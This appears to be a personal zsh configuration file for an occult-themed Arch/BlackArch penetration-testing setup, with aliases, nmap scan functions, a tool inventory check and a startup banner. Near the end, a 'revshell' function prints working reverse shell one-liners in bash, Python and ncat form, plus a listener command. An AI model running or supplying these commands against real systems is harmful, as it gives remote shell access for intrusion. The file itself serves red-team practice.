# ╔══════════════════════════════════════════════════════════════╗
# ║  PURPLE BRUCE LUCY — Chaos Magic ZSH Environment v6.0       ║
# ║  Eastern Orthodox · Wicca · Chaos Magic · Purple Team        ║
# ╚══════════════════════════════════════════════════════════════╝

# ── Oh-My-Zsh ────────────────────────────────────────────────────
export ZSH="$HOME/.oh-my-zsh"
ZSH_THEME="powerlevel10k/powerlevel10k"
DISABLE_AUTO_UPDATE="true"
DISABLE_AUTO_TITLE="true"

plugins=(
  git
  sudo
  colored-man-pages
  extract
  zsh-autosuggestions
  zsh-syntax-highlighting
)

if [[ -f "$ZSH/oh-my-zsh.sh" ]]; then
  source "$ZSH/oh-my-zsh.sh"
  [[ -f "$HOME/.p10k.zsh" ]] && source "$HOME/.p10k.zsh"
else
  # Fallback prompt — no OMZ needed
  autoload -U colors && colors
  PROMPT=$'\n%F{135}⛧%f %F{51}%n@%m%f %F{240}%~%f\n%F{201}❯%f '
  # Load system zsh plugins if installed via pacman
  [[ -f /usr/share/zsh/plugins/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh ]] && \
    source /usr/share/zsh/plugins/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh
  [[ -f /usr/share/zsh/plugins/zsh-autosuggestions/zsh-autosuggestions.zsh ]] && \
    source /usr/share/zsh/plugins/zsh-autosuggestions/zsh-autosuggestions.zsh
fi

# ── NVM ──────────────────────────────────────────────────────────
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh"

# ── PATH ─────────────────────────────────────────────────────────
export PATH="$HOME/.local/bin:$HOME/bin:$PATH"

# ── ENVIRONMENT ──────────────────────────────────────────────────
export COLORTERM=truecolor
export TERM=xterm-256color
export EDITOR=vim
export LANG=en_US.UTF-8
printf '\e[?12;25h'

# ── COMPLETION ───────────────────────────────────────────────────
autoload -U compinit && compinit -u
zstyle ':completion:*' menu select
setopt HIST_IGNORE_DUPS SHARE_HISTORY
HISTSIZE=10000; SAVEHIST=10000; HISTFILE=~/.zsh_history

# ── SYNTAX HIGHLIGHTING COLORS ───────────────────────────────────
ZSH_HIGHLIGHT_HIGHLIGHTERS=(main)
typeset -A ZSH_HIGHLIGHT_STYLES 2>/dev/null || true
ZSH_HIGHLIGHT_STYLES[command]='fg=51'
ZSH_HIGHLIGHT_STYLES[alias]='fg=201'
ZSH_HIGHLIGHT_STYLES[builtin]='fg=220'
ZSH_HIGHLIGHT_STYLES[function]='fg=46'
ZSH_AUTOSUGGEST_HIGHLIGHT_STYLE="fg=240"

# ╔══════════════════════════════════════════════════════════════╗
# ║  PURPLE BRUCE LUCY — ALIASES                                 ║
# ╚══════════════════════════════════════════════════════════════╝

# ── Purple Bruce ─────────────────────────────────────────────────
_nr() { command netrunner "$@" 2>/dev/null || echo "[⚠] netrunner not found — run install-arch.sh first"; }
alias pb='_nr'
alias lucy='_nr'
alias purple='_nr'
alias bruce='_nr'
alias doctor='_nr doctor'
alias deck='_nr deck'
alias team='_nr team'
alias overclock='_nr overclock'
alias scan='_nr scan'

# start — works with or without netrunner
_pb_start() {
  local dir="${HOME}/purplebruce"
  [[ -d "$dir" ]] || { echo "[✘] ~/purplebruce not found"; return 1; }
  mkdir -p "${HOME}/.purplebruce"
  if command -v netrunner >/dev/null 2>&1; then
    netrunner start
  elif command -v tmux >/dev/null 2>&1; then
    tmux new-session -d -s purplebruce -x 220 -y 50 2>/dev/null || true
    tmux send-keys -t purplebruce "cd ${dir} && node server.js 2>&1 | tee ~/.purplebruce/server.log" Enter
    echo "[✔] Server started in tmux → http://127.0.0.1:3000"
    echo "    tmux attach -t purplebruce"
  else
    cd "$dir" && node server.js &
    echo "[✔] Server started → http://127.0.0.1:3000"
  fi
}
alias start='_pb_start'
alias stop='pkill -f "node server.js" 2>/dev/null && echo "[✔] Server stopped." || echo "[⚠] Not running."'
alias restart='pkill -f "node server.js" 2>/dev/null; sleep 1; _pb_start'
alias logs='tail -f ~/.purplebruce/audit.log 2>/dev/null || tail -f ~/purplebruce/server.log 2>/dev/null || echo "[⚠] No log yet — run: start"'

# ── Occult Arsenal ───────────────────────────────────────────────
alias sigil='python3 ~/purplebruce/netrunner/occult/sigil.py'
alias moon='python3 ~/purplebruce/netrunner/occult/moon.py'
alias tarot='python3 ~/purplebruce/netrunner/occult/tarot.py'
alias rune='python3 ~/purplebruce/netrunner/occult/rune.py'
alias ritual='python3 ~/purplebruce/netrunner/occult/ritual.py'
alias intent='python3 ~/purplebruce/netrunner/occult/sigil.py'

# ── Hacking Shortcuts ────────────────────────────────────────────
# nq / nfull / nstealth defined as functions below (accept target arg)
alias nse='ls /usr/share/nmap/scripts/ | grep'
alias msfq='msfconsole -q'
alias se='searchsploit'
alias myip='curl -s ifconfig.me 2>/dev/null || wget -qO- ifconfig.me 2>/dev/null || echo unknown'
alias ports='ss -tlnp'
alias listening='ss -tlnp'
alias pyhttp='python3 -m http.server'
alias toolcheck='
echo "\n  \e[38;5;135m[BlackArch Arsenal Check]\e[0m\n"
_tools=(
  "nmap:recon" "masscan:recon" "zmap:recon" "hping3:recon" "arp-scan:recon"
  "ffuf:web" "gobuster:web" "feroxbuster:web" "nikto:web" "whatweb:web"
  "nuclei:vuln" "subfinder:osint" "httpx:web" "katana:web"
  "sqlmap:exploit" "commix:exploit" "dalfox:exploit" "xsstrike:exploit"
  "theharvester:osint" "amass:osint" "recon-ng:osint" "sherlock:osint"
  "hydra:password" "hashcat:password" "john:password" "medusa:password"
  "msfconsole:exploit" "msfvenom:exploit" "searchsploit:exploit"
  "crackmapexec:windows" "evil-winrm:windows" "impacket-smbclient:windows" "kerbrute:windows"
  "bloodhound:windows" "smbmap:windows" "enum4linux:windows"
  "pwncat:post-ex" "chisel:post-ex" "ligolo-ng:post-ex" "socat:post-ex"
  "radare2:rev-eng" "gdb:rev-eng" "ropper:rev-eng"
  "wireshark:forensics" "tshark:forensics" "binwalk:forensics" "exiftool:forensics"
  "steghide:stego" "zsteg:stego" "aircrack-ng:wireless" "wifite:wireless"
)
declare -A cats
for entry in "${_tools[@]}"; do
  t="${entry%%:*}"; c="${entry##*:}"
  if command -v "$t" >/dev/null 2>&1; then
    printf "  \e[32m✔\e[0m \e[38;5;51m%-22s\e[0m \e[38;5;240m%s\e[0m\n" "$t" "$c"
  else
    printf "  \e[31m✘\e[0m \e[38;5;240m%-22s %s\e[0m\n" "$t" "$c"
  fi
done
echo "\n  \e[38;5;240mpacman -S blackarch-<category>  or  pacman -S <toolname>\e[0m\n"
'
alias ba='pacman -Ss blackarch'
alias pac='pacman -S --noconfirm --needed'

# ── General ──────────────────────────────────────────────────────
alias ls='ls --color=auto -F'
alias ll='ls -lah --color=auto'
alias la='ls -lAh --color=auto'
alias grep='grep --color=auto'
alias ..='cd ..'
alias ...='cd ../..'
alias vi='vim'
alias c='clear'
alias cls='clear'

# ── tmux ─────────────────────────────────────────────────────────
alias t='tmux'
alias tn='tmux new -s'
alias ta='tmux attach -t'
alias tl='tmux list-sessions'
alias tk='tmux kill-session -t'

# ── Git ──────────────────────────────────────────────────────────
alias gs='git status'
alias gp='git push'
alias gl='git pull'
alias gd='git diff'
alias ga='git add'
alias gc='git commit'
alias gco='git checkout'

# ╔══════════════════════════════════════════════════════════════╗
# ║  FUNCTIONS                                                   ║
# ╚══════════════════════════════════════════════════════════════╝

# Nmap shortcuts
nq()      { nmap -T4 -F "${1:-localhost}"; }
nfull()   { nmap -T4 -A -p- "${1:-localhost}"; }
nstealth(){ nmap -sS -T2 -p- "${1:-localhost}"; }

# HTTP server
serve() { python3 -m http.server "${1:-8080}"; }

# Base64
b64e() { echo -n "$1" | base64; }
b64d() { echo -n "$1" | base64 -d; }
sha()  { echo -n "$1" | sha256sum; }

# Extract any archive
extract() {
  case "$1" in
    *.tar.gz|*.tgz) tar -xzf "$1" ;;
    *.tar.bz2)      tar -xjf "$1" ;;
    *.zip)          unzip "$1" ;;
    *.7z)           7z x "$1" ;;
    *.gz)           gunzip "$1" ;;
    *.rar)          unrar x "$1" ;;
    *)              echo "Unknown: $1" ;;
  esac
}

# Quick port check
portcheck() { nmap -p "$1" "${2:-localhost}" 2>/dev/null | grep -E "open|closed|filtered"; }

# Reverse shell helper
revshell() {
  local ip="${1:-$(hostname -I | awk '{print $1}')}"
  local port="${2:-4444}"
  echo "\n[Reverse Shell Listeners]"
  echo "  bash:    bash -i >& /dev/tcp/$ip/$port 0>&1"
  echo "  python:  python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"$ip\",$port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'"
  echo "  nc:      ncat $ip $port -e /bin/bash"
  echo "\n  Listener: ncat -lvnp $port"
}

# ╔══════════════════════════════════════════════════════════════╗
# ║  CHAOS MAGIC BANNER — shown on shell start                  ║
# ╚══════════════════════════════════════════════════════════════╝
_pb_banner() {
  local V=$'\e[38;5;135m'  # violet
  local C=$'\e[38;5;51m'   # cyan
  local G=$'\e[38;5;46m'   # green
  local Y=$'\e[38;5;220m'  # gold
  local M=$'\e[38;5;201m'  # magenta
  local D=$'\e[38;5;240m'  # dim
  local W=$'\e[1;37m'      # white bold
  local RS=$'\e[0m'

  echo ""
  echo "  ${V}╭────────────────────────────────────────────╮${RS}"
  echo "  ${V}│${RS}                                            ${V}│${RS}"
  echo "  ${V}│${RS}  ${M}⛧${RS}  ${W}PURPLE BRUCE LUCY${RS}  ${D}v6.0${RS}  ${M}⛧${RS}           ${V}│${RS}"
  echo "  ${V}│${RS}  ${D}Chaos Magic · Purple Team · Hacker${RS}      ${V}│${RS}"
  echo "  ${V}│${RS}  ${D}Eastern Orthodox · Wicca · Servitor${RS}     ${V}│${RS}"
  echo "  ${V}│${RS}                                            ${V}│${RS}"
  echo "  ${V}│${RS}  ${Y}⬡${RS}  ${C}Sigil:${RS} Ouroboros-Caduceus              ${V}│${RS}"
  echo "  ${V}│${RS}  ${Y}⬡${RS}  ${C}Arch${RS} + BlackArch proot  ${D}[LAYER 2]${RS}   ${V}│${RS}"
  echo "  ${V}│${RS}                                            ${V}│${RS}"
  echo "  ${V}╰────────────────────────────────────────────╯${RS}"
  echo ""
  # Moon phase — inline
  python3 ~/purplebruce/netrunner/occult/moon.py 2>/dev/null | sed "s/^/  /"
  echo ""
  echo "  ${G}⚡${RS} ${W}start${RS}     ${D}→ launch server (tmux)${RS}"
  echo "  ${G}⚡${RS} ${W}lucy${RS}      ${D}→ netrunner menu${RS}"
  echo "  ${Y}⬡${RS} ${W}sigil${RS}     ${D}→ sigil generator${RS}"
  echo "  ${Y}⬡${RS} ${W}tarot${RS}     ${D}→ tarot draw${RS}"
  echo "  ${Y}⬡${RS} ${W}moon${RS}      ${D}→ moon phase${RS}"
  echo "  ${Y}⬡${RS} ${W}rune${RS}      ${D}→ rune cast${RS}"
  echo "  ${D}──────────────────────────────${RS}"
  echo "  ${C}toolcheck${RS}  ${D}→ verify BlackArch arsenal${RS}"
  echo ""
}
_pb_banner
